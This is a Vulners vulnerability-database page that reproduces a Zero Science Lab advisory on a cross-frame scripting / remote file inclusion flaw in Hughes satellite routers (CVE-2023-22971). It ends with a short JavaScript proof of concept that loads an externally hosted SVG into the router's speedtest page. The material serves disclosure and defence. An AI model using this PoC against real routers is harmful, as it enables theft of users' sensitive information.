Vulners
Lucene search
Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Hughes Network Systems HX200 跨站脚本漏洞 | 26 Jan 202300:00 | – | cnnvd |
 | CVE-2023-22971 | 26 Jan 202300:00 | – | cve |
 | CVE-2023-22971 | 26 Jan 202300:00 | – | cvelist |
 | EUVD-2023-27071 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-22971 | 26 Jan 202321:18 | – | nvd |
 | CVE-2023-22971 | 26 Jan 202321:18 | – | osv |
 | Cross site scripting | 26 Jan 202321:18 | – | prion |
 | CVE-2023-22971 | 23 May 202505:52 | – | redhatcve |
 | CVE-2023-22971 | 26 Jan 202300:00 | – | vulnrichment |
<html><body><p>Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting
Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37
Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.
Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.
Tested on: WindWeb/1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
23.12.2022
--
snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()
console.log("Loading Broadband Satellite Browsing Test");
//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
console.log("Calling StartTest()");
StartTest()
//console.log("Calling DoTest()");
//DoTest()
//Unload weapon
//document.getElementById("URLList").remove();
</p></body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Dec 2022 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.00675
SSVC